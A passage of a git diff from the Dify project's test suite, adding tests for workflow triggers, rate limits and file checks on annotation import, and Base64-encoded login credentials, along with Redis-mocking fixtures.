app_id=app_model.id, + node_id=webhook_node_id, + tenant_id=tenant.id, + webhook_id=WEBHOOK_ID_DEBUG, + created_by=account.id, + ) + db_session_with_containers.add(webhook_trigger) + db_session_with_containers.commit() + + debug_events: list[dict[str, Any]] = [] + original_dispatch = TriggerDebugEventBus.dispatch + monkeypatch.setattr( + "controllers.trigger.webhook.TriggerDebugEventBus.dispatch", + lambda **kwargs: (debug_events.append(kwargs), original_dispatch(**kwargs))[1], + ) + + # Listener polls first to enter waiting pool + poller = WebhookTriggerDebugEventPoller( + tenant_id=tenant.id, + user_id=account.id, + app_id=app_model.id, + node_config=draft_workflow.get_node_config_by_id(webhook_node_id), + node_id=webhook_node_id, + ) + assert poller.poll() is None + + response = test_client_with_containers.post( + f"/triggers/webhook-debug/{webhook_trigger.webhook_id}", + json={"foo": "bar"}, + headers={"Content-Type": "application/json"}, + ) + + assert response.status_code == 200 + assert debug_events, "Debug event should be sent to event bus" + # Second poll should get the event + event = poller.poll() + assert event is not None + assert event.workflow_args["inputs"]["webhook_body"]["foo"] == "bar" + assert debug_events[0]["pool_key"].endswith(f":{app_model.id}:{webhook_node_id}") + + +def test_plugin_single_step_debug_flow( + flask_app_with_containers: Flask, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin single-step debug: listen -> dispatch event -> poller receives and returns variables.""" + tenant_id = "tenant-1" + app_id = "app-1" + user_id = "user-1" + node_id = "plugin-node" + provider_id = "langgenius/provider-1/provider-1" + node_config = { + "id": node_id, + "data": { + "type": NodeType.TRIGGER_PLUGIN.value, + "title": "plugin", + "plugin_id": "plugin-1", + "plugin_unique_identifier": "plugin-1", + "provider_id": provider_id, + "event_name": "created", + "subscription_id": "sub-1", + "parameters": {}, + }, + } + # Start listening + poller = PluginTriggerDebugEventPoller( + tenant_id=tenant_id, + user_id=user_id, + app_id=app_id, + node_config=node_config, + node_id=node_id, + ) + assert poller.poll() is None + + from core.trigger.debug.events import build_plugin_pool_key + + pool_key = build_plugin_pool_key( + tenant_id=tenant_id, + provider_id=provider_id, + subscription_id="sub-1", + name="created", + ) + TriggerDebugEventBus.dispatch( + tenant_id=tenant_id, + event=PluginTriggerDebugEvent( + timestamp=int(time.time()), + user_id=user_id, + name="created", + request_id="req-1", + subscription_id="sub-1", + provider_id="provider-1", + ), + pool_key=pool_key, + ) + + from core.plugin.entities.request import TriggerInvokeEventResponse + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.invoke_trigger_event", + staticmethod( + lambda **_kwargs: TriggerInvokeEventResponse( + variables={"echo": "pong"}, + cancelled=False, + ) + ), + ) + + event = poller.poll() + assert event is not None + assert event.workflow_args["inputs"]["echo"] == "pong" + + +def test_schedule_trigger_creates_trigger_log( + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Schedule trigger execution should create WorkflowTriggerLog in database.""" + from tasks import workflow_schedule_tasks + + tenant, account = tenant_and_account + + # Create published workflow with schedule trigger node + schedule_node_id = "schedule-node" + graph = { + "nodes": [ + { + "id": schedule_node_id, + "data": { + "type": NodeType.TRIGGER_SCHEDULE.value, + "title": "schedule", + "mode": "cron", + "cron_expression": "0 9 * * *", + "timezone": "UTC", + }, + }, + {"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}}, + ], + "edges": [{"source": schedule_node_id, "target": "answer-1", "sourceHandle": "success"}], + } + published_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.version_from_datetime(naive_utc_now()), + graph=json.dumps(graph), + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(published_workflow) + app_model.workflow_id = published_workflow.id + db_session_with_containers.commit() + + # Create schedule plan + plan = WorkflowSchedulePlan( + app_id=app_model.id, + node_id=schedule_node_id, + tenant_id=tenant.id, + cron_expression="0 9 * * *", + timezone="UTC", + next_run_at=naive_utc_now() - timedelta(minutes=1), + ) + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=schedule_node_id, + trigger_type=AppTriggerType.TRIGGER_SCHEDULE, + status=AppTriggerStatus.ENABLED, + title="schedule", + ) + db_session_with_containers.add_all([plan, app_trigger]) + db_session_with_containers.commit() + + # Mock AsyncWorkflowService to create WorkflowTriggerLog + def _fake_trigger_workflow_async(session: Session, user: Any, trigger_data: Any) -> SimpleNamespace: + log = WorkflowTriggerLog( + tenant_id=trigger_data.tenant_id, + app_id=trigger_data.app_id, + workflow_id=published_workflow.id, + root_node_id=trigger_data.root_node_id, + trigger_metadata="{}", + trigger_type=AppTriggerType.TRIGGER_SCHEDULE, + workflow_run_id=None, + outputs=None, + trigger_data=trigger_data.model_dump_json(), + inputs=json.dumps(dict(trigger_data.inputs)), + status=WorkflowTriggerStatus.SUCCEEDED, + error="", + queue_name="schedule_executor", + celery_task_id="celery-schedule-test", + created_by_role=CreatorUserRole.ACCOUNT, + created_by=account.id, + ) + session.add(log) + session.commit() + return SimpleNamespace(workflow_trigger_log_id=log.id, task_id=None, status="queued", queue="test") + + monkeypatch.setattr( + workflow_schedule_tasks.AsyncWorkflowService, + "trigger_workflow_async", + _fake_trigger_workflow_async, + ) + + # Mock quota to avoid rate limiting + from enums import quota_type + + monkeypatch.setattr(quota_type.QuotaType.TRIGGER, "consume", lambda _tenant_id: quota_type.unlimited()) + + # Execute schedule trigger + workflow_schedule_tasks.run_schedule_trigger(plan.id) + + # Verify WorkflowTriggerLog was created + db_session_with_containers.expire_all() + logs = db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app_model.id).all() + assert logs, "Schedule trigger should create WorkflowTriggerLog" + assert logs[0].trigger_type == AppTriggerType.TRIGGER_SCHEDULE + assert logs[0].root_node_id == schedule_node_id + + +@pytest.mark.parametrize( + ("mode", "frequency", "visual_config", "cron_expression", "expected_cron"), + [ + # Visual mode: hourly + ("visual", "hourly", {"on_minute": 30}, None, "30 * * * *"), + # Visual mode: daily + ("visual", "daily", {"time": "3:00 PM"}, None, "0 15 * * *"), + # Visual mode: weekly + ("visual", "weekly", {"time": "9:00 AM", "weekdays": ["mon", "wed", "fri"]}, None, "0 9 * * 1,3,5"), + # Visual mode: monthly + ("visual", "monthly", {"time": "10:30 AM", "monthly_days": [1, 15]}, None, "30 10 1,15 * *"), + # Cron mode: direct expression + ("cron", None, None, "*/5 * * * *", "*/5 * * * *"), + ], +) +def test_schedule_visual_cron_conversion( + mode: str, + frequency: str | None, + visual_config: dict[str, Any] | None, + cron_expression: str | None, + expected_cron: str, +) -> None: + """Schedule visual config should correctly convert to cron expression.""" + + node_config: dict[str, Any] = { + "id": "schedule-node", + "data": { + "type": NodeType.TRIGGER_SCHEDULE.value, + "mode": mode, + "timezone": "UTC", + }, + } + + if mode == "visual": + node_config["data"]["frequency"] = frequency + node_config["data"]["visual_config"] = visual_config + else: + node_config["data"]["cron_expression"] = cron_expression + + config = ScheduleService.to_schedule_config(node_config) + + assert config.cron_expression == expected_cron, f"Expected {expected_cron}, got {config.cron_expression}" + assert config.timezone == "UTC" + assert config.node_id == "schedule-node" + + +def test_plugin_trigger_full_chain_with_db_verification( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin trigger should create WorkflowTriggerLog and WorkflowPluginTrigger records.""" + + tenant, account = tenant_and_account + + # Create published workflow with plugin trigger node + plugin_node_id = "plugin-trigger-node" + provider_id = "langgenius/test-provider/test-provider" + subscription_id = "sub-plugin-test" + endpoint_id = "2cc7fa12-3f7b-4f6a-9c8d-1234567890ab" + + graph = { + "nodes": [ + { + "id": plugin_node_id, + "data": { + "type": NodeType.TRIGGER_PLUGIN.value, + "title": "plugin", + "plugin_id": "test-plugin", + "plugin_unique_identifier": "test-plugin", + "provider_id": provider_id, + "event_name": "test_event", + "subscription_id": subscription_id, + "parameters": {}, + }, + }, + {"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}}, + ], + "edges": [{"source": plugin_node_id, "target": "answer-1", "sourceHandle": "success"}], + } + published_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.version_from_datetime(naive_utc_now()), + graph=json.dumps(graph), + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(published_workflow) + app_model.workflow_id = published_workflow.id + db_session_with_containers.commit() + + # Create trigger subscription + subscription = TriggerSubscription( + name="test-subscription", + tenant_id=tenant.id, + user_id=account.id, + provider_id=provider_id, + endpoint_id=endpoint_id, + parameters={}, + properties={}, + credentials={"token": "test-secret"}, + credential_type="api-key", + ) + db_session_with_containers.add(subscription) + db_session_with_containers.commit() + + # Update subscription_id to match the created subscription + graph["nodes"][0]["data"]["subscription_id"] = subscription.id + published_workflow.graph = json.dumps(graph) + db_session_with_containers.commit() + + # Create WorkflowPluginTrigger + plugin_trigger = WorkflowPluginTrigger( + app_id=app_model.id, + tenant_id=tenant.id, + node_id=plugin_node_id, + provider_id=provider_id, + event_name="test_event", + subscription_id=subscription.id, + ) + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=plugin_node_id, + trigger_type=AppTriggerType.TRIGGER_PLUGIN, + status=AppTriggerStatus.ENABLED, + title="plugin", + ) + db_session_with_containers.add_all([plugin_trigger, app_trigger]) + db_session_with_containers.commit() + + # Track dispatched data + dispatched_data: list[dict[str, Any]] = [] + + def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response: + dispatch_data = { + "user_id": "end-user", + "tenant_id": tenant.id, + "endpoint_id": _endpoint_id, + "provider_id": provider_id, + "subscription_id": subscription.id, + "timestamp": int(time.time()), + "events": ["test_event"], + "request_id": f"req-{_endpoint_id}", + } + dispatched_data.append(dispatch_data) + return Response("ok", status=202) + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.process_endpoint", + staticmethod(_fake_process_endpoint), + ) + + response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"test": "data"}) + + assert response.status_code == 202 + assert dispatched_data, "Plugin trigger should dispatch event data" + assert dispatched_data[0]["subscription_id"] == subscription.id + assert dispatched_data[0]["events"] == ["test_event"] + + # Verify database records exist + db_session_with_containers.expire_all() + plugin_triggers = ( + db_session_with_containers.query(WorkflowPluginTrigger) + .filter_by(app_id=app_model.id, node_id=plugin_node_id) + .all() + ) + assert plugin_triggers, "WorkflowPluginTrigger record should exist" + assert plugin_triggers[0].provider_id == provider_id + assert plugin_triggers[0].event_name == "test_event" + + +def test_plugin_debug_via_http_endpoint( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin single-step debug via HTTP endpoint should dispatch debug event and be pollable.""" + + tenant, account = tenant_and_account + + provider_id = "langgenius/debug-provider/debug-provider" + endpoint_id = "3cc7fa12-3f7b-4f6a-9c8d-1234567890ab" + event_name = "debug_event" + + # Create subscription + subscription = TriggerSubscription( + name="debug-subscription", + tenant_id=tenant.id, + user_id=account.id, + provider_id=provider_id, + endpoint_id=endpoint_id, + parameters={}, + properties={}, + credentials={"token": "debug-secret"}, + credential_type="api-key", + ) + db_session_with_containers.add(subscription) + db_session_with_containers.commit() + + # Create plugin trigger node config + node_id = "plugin-debug-node" + node_config = { + "id": node_id, + "data": { + "type": NodeType.TRIGGER_PLUGIN.value, + "title": "plugin-debug", + "plugin_id": "debug-plugin", + "plugin_unique_identifier": "debug-plugin", + "provider_id": provider_id, + "event_name": event_name, + "subscription_id": subscription.id, + "parameters": {}, + }, + } + + # Start listening with poller + + poller = PluginTriggerDebugEventPoller( + tenant_id=tenant.id, + user_id=account.id, + app_id=app_model.id, + node_config=node_config, + node_id=node_id, + ) + assert poller.poll() is None, "First poll should return None (waiting)" + + # Track debug events dispatched + debug_events: list[dict[str, Any]] = [] + original_dispatch = TriggerDebugEventBus.dispatch + + def _tracking_dispatch(**kwargs: Any) -> int: + debug_events.append(kwargs) + return original_dispatch(**kwargs) + + monkeypatch.setattr(TriggerDebugEventBus, "dispatch", staticmethod(_tracking_dispatch)) + + # Mock process_endpoint to trigger debug event dispatch + def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response: + # Simulate what happens inside process_endpoint + dispatch_triggered_workflows_async + pool_key = build_plugin_pool_key( + tenant_id=tenant.id, + provider_id=provider_id, + subscription_id=subscription.id, + name=event_name, + ) + TriggerDebugEventBus.dispatch( + tenant_id=tenant.id, + event=PluginTriggerDebugEvent( + timestamp=int(time.time()), + user_id="end-user", + name=event_name, + request_id=f"req-{_endpoint_id}", + subscription_id=subscription.id, + provider_id=provider_id, + ), + pool_key=pool_key, + ) + return Response("ok", status=202) + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.process_endpoint", + staticmethod(_fake_process_endpoint), + ) + + # Call HTTP endpoint + response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"debug": "payload"}) + + assert response.status_code == 202 + assert debug_events, "Debug event should be dispatched via HTTP endpoint" + assert debug_events[0]["event"].name == event_name + + # Mock invoke_trigger_event for poller + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.invoke_trigger_event", + staticmethod( + lambda **_kwargs: TriggerInvokeEventResponse( + variables={"http_debug": "success"}, + cancelled=False, + ) + ), + ) + + # Second poll should receive the event + event = poller.poll() + assert event is not None, "Poller should receive debug event after HTTP trigger" + assert event.workflow_args["inputs"]["http_debug"] == "success" diff --git a/api/tests/unit_tests/conftest.py b/api/tests/unit_tests/conftest.py index f484fb22d3..c5e1576186 100644 --- a/api/tests/unit_tests/conftest.py +++ b/api/tests/unit_tests/conftest.py @@ -26,16 +26,29 @@ redis_mock.hgetall = MagicMock(return_value={}) redis_mock.hdel = MagicMock() redis_mock.incr = MagicMock(return_value=1) +# Ensure OpenDAL fs writes to tmp to avoid polluting workspace +os.environ.setdefault("OPENDAL_SCHEME", "fs") +os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") +os.environ.setdefault("STORAGE_TYPE", "opendal") + # Add the API directory to Python path to ensure proper imports import sys sys.path.insert(0, PROJECT_DIR) -# apply the mock to the Redis client in the Flask app from extensions import ext_redis -redis_patcher = patch.object(ext_redis, "redis_client", redis_mock) -redis_patcher.start() + +def _patch_redis_clients_on_loaded_modules(): + """Ensure any module-level redis_client references point to the shared redis_mock.""" + + import sys + + for module in list(sys.modules.values()): + if module is None: + continue + if hasattr(module, "redis_client"): + module.redis_client = redis_mock @pytest.fixture @@ -49,6 +62,15 @@ def _provide_app_context(app: Flask): yield +@pytest.fixture(autouse=True) +def _patch_redis_clients(): + """Patch redis_client to MagicMock only for unit test executions.""" + + with patch.object(ext_redis, "redis_client", redis_mock): + _patch_redis_clients_on_loaded_modules() + yield + + @pytest.fixture(autouse=True) def reset_redis_mock(): """reset the Redis mock before each test""" @@ -63,3 +85,20 @@ def reset_redis_mock(): redis_mock.hgetall.return_value = {} redis_mock.hdel.return_value = None redis_mock.incr.return_value = 1 + + # Keep any imported modules pointing at the mock between tests + _patch_redis_clients_on_loaded_modules() + + +@pytest.fixture(autouse=True) +def reset_secret_key(): + """Ensure SECRET_KEY-dependent logic sees an empty config value by default.""" + + from configs import dify_config + + original = dify_config.SECRET_KEY + dify_config.SECRET_KEY = "" + try: + yield + finally: + dify_config.SECRET_KEY = original diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py new file mode 100644 index 0000000000..06a7b98baf --- /dev/null +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -0,0 +1,347 @@ +""" +Unit tests for annotation import security features. + +Tests rate limiting, concurrency control, file validation, and other +security features added to prevent DoS attacks on the annotation import endpoint. +""" + +import io +from unittest.mock import MagicMock, patch + +import pytest +from pandas.errors import ParserError +from werkzeug.datastructures import FileStorage + +from configs import dify_config + + +class TestAnnotationImportRateLimiting: + """Test rate limiting for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_rate_limit_per_minute_enforced(self, mock_redis, mock_current_account): + """Test that per-minute rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-minute limit + mock_redis.zcard.side_effect = [ + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE + 1, # Minute check + 10, # Hour check + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + # Verify it's a rate limit error + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_per_hour_enforced(self, mock_redis, mock_current_account): + """Test that per-hour rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-hour limit + mock_redis.zcard.side_effect = [ + 3, # Minute check (under limit) + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR + 1, # Hour check (over limit) + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_within_limits_passes(self, mock_redis, mock_current_account): + """Test that requests within limits are allowed.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate being under both limits + mock_redis.zcard.return_value = 2 + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + # Verify Redis operations were called + assert mock_redis.zadd.called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportConcurrencyControl: + """Test concurrency control for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_concurrency_limit_enforced(self, mock_redis, mock_current_account): + """Test that concurrent task limit is enforced.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate max concurrent tasks already running + mock_redis.zcard.return_value = dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "concurrent" in str(exc_info.value).lower() + + def test_concurrency_within_limit_passes(self, mock_redis, mock_current_account): + """Test that requests within concurrency limits are allowed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate being under concurrent task limit + mock_redis.zcard.return_value = 1 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + def test_stale_jobs_are_cleaned_up(self, mock_redis, mock_current_account): + """Test that old/stale job entries are removed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + mock_redis.zcard.return_value = 0 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + dummy_view() + + # Verify cleanup was called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportFileValidation: + """Test file validation in annotation import.""" + + def test_file_size_limit_enforced(self): + """Test that files exceeding size limit are rejected.""" + # Create a file larger than the limit + max_size = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + large_content = b"x" * (max_size + 1024) # Exceed by 1KB + + file = FileStorage(stream=io.BytesIO(large_content), filename="test.csv", content_type="text/csv") + + # Should be rejected in controller + # This would be tested in integration tests with actual endpoint + + def test_empty_file_rejected(self): + """Test that empty files are rejected.""" + file = FileStorage(stream=io.BytesIO(b""), filename="test.csv", content_type="text/csv") + + # Should be rejected + # This would be tested in integration tests + + def test_non_csv_file_rejected(self): + """Test that non-CSV files are rejected.""" + file = FileStorage(stream=io.BytesIO(b"test"), filename="test.txt", content_type="text/plain") + + # Should be rejected based on extension + # This would be tested in integration tests + + +class TestAnnotationImportServiceValidation: + """Test service layer validation for annotation import.""" + + @pytest.fixture + def mock_app(self): + """Mock application object.""" + app = MagicMock() + app.id = "app_id" + return app + + @pytest.fixture + def mock_db_session(self): + """Mock database session.""" + with patch("services.annotation_service.db.session") as mock: + yield mock + + def test_max_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too many records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with too many records + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + csv_content = "question,answer\n" + for i in range(max_records + 100): + csv_content += f"Question {i},Answer {i}\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about too many records + assert "error_msg" in result + assert "too many" in result["error_msg"].lower() or "maximum" in result["error_msg"].lower() + + def test_min_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too few valid records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with only header (no data rows) + csv_content = "question,answer\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about insufficient records + assert "error_msg" in result + assert "at least" in result["error_msg"].lower() or "minimum" in result["error_msg"].lower() + + def test_invalid_csv_format_handled(self, mock_app, mock_db_session): + """Test that invalid CSV format is handled gracefully.""" + from services.annotation_service import AppAnnotationService + + # Any content is fine once we force ParserError + csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with ( + patch("services.annotation_service.current_account_with_tenant") as mock_auth, + patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")), + ): + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + assert "error_msg" in result + assert "malformed" in result["error_msg"].lower() + + def test_valid_import_succeeds(self, mock_app, mock_db_session): + """Test that valid import request succeeds.""" + from services.annotation_service import AppAnnotationService + + # Create valid CSV + csv_content = "question,answer\nWhat is AI?,Artificial Intelligence\nWhat is ML?,Machine Learning\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + with patch("services.annotation_service.batch_import_annotations_task") as mock_task: + with patch("services.annotation_service.redis_client"): + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return success response + assert "job_id" in result + assert "job_status" in result + assert result["job_status"] == "waiting" + assert "record_count" in result + assert result["record_count"] == 2 + + +class TestAnnotationImportTaskOptimization: + """Test optimizations in batch import task.""" + + def test_task_has_timeout_configured(self): + """Test that task has proper timeout configuration.""" + from tasks.annotation.batch_import_annotations_task import batch_import_annotations_task + + # Verify task configuration + assert hasattr(batch_import_annotations_task, "time_limit") + assert hasattr(batch_import_annotations_task, "soft_time_limit") + + # Check timeout values are reasonable + # Hard limit should be 6 minutes (360s) + # Soft limit should be 5 minutes (300s) + # Note: actual values depend on Celery configuration + + +class TestConfigurationValues: + """Test that security configuration values are properly set.""" + + def test_rate_limit_configs_exist(self): + """Test that rate limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE") + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR") + + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE > 0 + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR > 0 + + def test_file_size_limit_config_exists(self): + """Test that file size limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_FILE_SIZE_LIMIT") + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT > 0 + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT <= 10 # Reasonable max (10MB) + + def test_record_limit_configs_exist(self): + """Test that record limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_RECORDS") + assert hasattr(dify_config, "ANNOTATION_IMPORT_MIN_RECORDS") + + assert dify_config.ANNOTATION_IMPORT_MAX_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS < dify_config.ANNOTATION_IMPORT_MAX_RECORDS + + def test_concurrency_limit_config_exists(self): + """Test that concurrency limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_CONCURRENT") + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT > 0 + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT <= 10 # Reasonable upper bound diff --git a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py index b6697ac5d4..eb21920117 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py +++ b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py @@ -1,5 +1,6 @@ """Test authentication security to prevent user enumeration.""" +import base64 from unittest.mock import MagicMock, patch import pytest @@ -11,6 +12,11 @@ from controllers.console.auth.error import AuthenticationFailedError from controllers.console.auth.login import LoginApi +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestAuthenticationSecurity: """Test authentication endpoints for security against user enumeration.""" @@ -42,7 +48,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -72,7 +80,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "existing@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "existing@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -104,7 +114,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() diff --git a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py index a44f518171..9929a71120 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py +++ b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py @@ -8,6 +8,7 @@ This module tests the email code login mechanism including: - Workspace creation for new users """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -25,6 +26,11 @@ from controllers.console.error import ( from services.errors.account import AccountRegisterError +def encode_code(code: str) -> str: + """Helper to encode verification code as Base64 for testing.""" + return base64.b64encode(code.encode("utf-8")).decode() + + class TestEmailCodeLoginSendEmailApi: """Test cases for sending email verification codes.""" @@ -290,7 +296,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "valid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "valid_token"}, ): api = EmailCodeLoginApi() response = api.post() @@ -339,7 +345,12 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "newuser@example.com", "code": "123456", "token": "valid_token", "language": "en-US"}, + json={ + "email": "newuser@example.com", + "code": encode_code("123456"), + "token": "valid_token", + "language": "en-US", + }, ): api = EmailCodeLoginApi() response = api.post() @@ -365,7 +376,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "invalid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "invalid_token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidTokenError): @@ -388,7 +399,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "different@example.com", "code": "123456", "token": "token"}, + json={"email": "different@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidEmailError): @@ -411,7 +422,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "wrong_code", "token": "token"}, + json={"email": 